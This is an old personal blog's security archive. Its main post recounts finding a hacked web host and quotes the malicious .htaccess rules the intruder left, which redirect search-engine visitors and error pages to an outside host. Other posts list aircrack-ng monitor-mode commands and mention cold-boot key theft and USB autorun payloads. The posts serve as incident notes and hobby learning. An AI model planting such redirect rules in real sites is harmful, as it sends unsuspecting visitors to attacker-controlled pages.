Archive for the Category » Security «

Sunday, July 26th, 2009 | Author:

It’s been a while since my last entry. A few things was happening, my blog engine went kaput a few weeks ago and it actually affected my Google ranking. 🙁 I saw a significant drop search engine directed traffic.

Recently I discovered some malicious activity on my other web host. I was going through my gallery, http://jiehong.net/gallery when after a few clicks, I got re-directed to ask.com. I thought I haven’t renew my subscription or my domain hosting.

After checking my subscriptions, all is fine. I went into cPanel to poke around. What can cause re-directions, I check the re-directions settings, sub-domains etc. Finally I discover some re-directing codes in some of my .htaccess.

Sample:

ErrorDocument 400 http://ake.kz/in.cgi?8
ErrorDocument 401 http://ake.kz/in.cgi?8
ErrorDocument 403 http://ake.kz/in.cgi?8
ErrorDocument 404 http://ake.kz/in.cgi?8
ErrorDocument 500 http://ake.kz/in.cgi?8

RewriteEngine On
RewriteCond %{HTTP_REFERER} .*google.* [OR]
RewriteCond %{HTTP_REFERER} .*ask.* [OR]
RewriteCond %{HTTP_REFERER} .*yahoo.* [OR]
RewriteCond %{HTTP_REFERER} .*excite.* [OR]
RewriteCond %{HTTP_REFERER} .*altavista.* [OR]
RewriteCond %{HTTP_REFERER} .*msn.* [OR]
RewriteCond %{HTTP_REFERER} .*netscape.* [OR]
RewriteCond %{HTTP_REFERER} .*aol.* [OR]
RewriteCond %{HTTP_REFERER} .*hotbot.* [OR]
RewriteCond %{HTTP_REFERER} .*goto.* [OR]
RewriteCond %{HTTP_REFERER} .*infoseek.* [OR]
RewriteCond %{HTTP_REFERER} .*mamma.* [OR]
RewriteCond %{HTTP_REFERER} .*alltheweb.* [OR]
RewriteCond %{HTTP_REFERER} .*lycos.* [OR]
RewriteCond %{HTTP_REFERER} .*search.* [OR]
RewriteCond %{HTTP_REFERER} .*metacrawler.* [OR]
RewriteCond %{HTTP_REFERER} .*bing.* [OR]
RewriteCond %{HTTP_REFERER} .*dogpile.*
RewriteRule ^(.*)$ http://ake.kz/in.cgi?7 [R=301,L]

I discovered a folder was created in my public_html, “coming10/almost”. What’s almost, the hacking is almost done ?
I found the following files inside
– .htaccess
– doing83.html
– er404.php
– everyting40php
– thanks28.html

They all contain encoded javascript to redirect visitors to some site. MY VISITORS ! I reported to my web host, I wonder how much action can they take. They are using ClamAV to scan the /home. Oh well… I’m expecting somebody eye-balling the logs to determine the source of entry.

Now I still do not know how they got in, so I need to monitor my site very closely.


Category: Security, Technical  | Tags: , , ,  | One Comment
Sunday, October 19th, 2008 | Author:

I just read this article on using compressed air to cool a memory chip so it will retain data even power is been cut off.

A video can be found here on the process and on why colder memory chip will retain data longer. By retaining the data, you can do a dump of the data and extract the cryptographic keys. They were able to extract keys for BitLocker, TrueCrypt, FileVault and dm-crypt.

The attack is not exploiting weakness of the encryption software but due to the fact that the keys have to be stored in memory. Encrypting the key in memory don’t really help, you still need to store that key that encrypts somewhere !

Category: Security, Systems  | Tags: ,  | Leave a Comment
Sunday, October 05th, 2008 | Author:

My story on why I decided to change the phone lock timeout.

When I first power on my HTC Touch Pro, I went through the start up wizard, it prompt me to set a phone lock pin and a timeout for activating the lock. I decided to go with 15mins, since I can change it later.

I decided to configure an Exchange profile on my Touch Pro for my office emails, since I have a Mobile Broadband plan with a 50GB data limit.

more…

Tuesday, September 30th, 2008 | Author:

Now, this is interesting for you iPhone folks. Check Point is providing IPsec VPN client for iPhone.

Link

Thursday, January 03rd, 2008 | Author:

If you installed Back Track 2 into your hdd and if you want to update the aircrack-ng suite, here’s the commands to do so.

more…

Category: Linux, Security, Technical  | Tags: ,  | Leave a Comment
Friday, December 28th, 2007 | Author:

I managed to get hold of a Linksys WUSB54GC USB wireless-g adapter and a burnt copy of Backtrack 2 with Aircrack-ng.

So let’s get started then..Back Track 2 loaded with the rt73 drivers.

The following commands is to get your WUSB54GC dongle into the monitor/injection mode.

“ifconfig rausb0 up”

“iwconfig rausb0 mode monitor channel 1 rate 1M”

“iwpriv rausb0 forceprism 1”

“iwpriv rausb0 rfmontx 1”

more…

Saturday, December 09th, 2006 | Author:

I got my Sandisk 2GB U3 drive at Sitex 2006 @ SGD71. This is a real threat of U3 drives, check the hacks available here: http://www.hak5.org/wiki/USB_Hacksaw

Forbes reported, A recent news of data related to U.S underground nuclear weapon tests been leaked from Los Alamo Labs.

The threat of USB and other removable media is real and enterprises should be looking into solutions to protect those endpoints

Wednesday, October 18th, 2006 | Author:

Wow I need to get a U3 Thumbdrive !

A thumbdrive with 2 partition, 1 which emulate a CD/DVDrom device when plugged into your workstation.

Quoted from Wikipedia, “USB flash drives adhering to the U3 specification are termed “U3 smart drives” by U3.com. “U3 smart drives” differ from traditional USB flash drives because they come preinstalled with the U3 Launchpad, which emulates the Windows OS start menu, and controls program installation.”

Autorun ? Payload ? Malware ? endless ways to go right through your cleverly laid perimeter security.

http://www.hak5.org/wiki/USB_Hacksaw USB shall be seen as EVIL !

Category: Security, Technical  | Comments off
Friday, May 12th, 2006 | Author:

I have a problem which most of us are facing.

How many usernames and passwords are you keeping track of ? Or even the email address that you used to create that account with ? Admit it, most of us have more than 1 email address. 🙂
So how do you keep track of them ? Save into a spreadsheet ? Are they secured ? Most spreadsheets built-in protection are not good enough.

more…

Category: Security, Technical  | Comments off
Monday, April 24th, 2006 | Author:

Will companies use a system like ISMS to ensure that they are meeting with ISO17799, BS7799 compliance for Information Security ?

ISMS in short, Information Security Management System
ISMS, detailed documentation on controls, threats, vulnerabilities.

Any book to recommend or document templates samples for an inspiring Security Auditor ? :p

Category: Security  | Comments off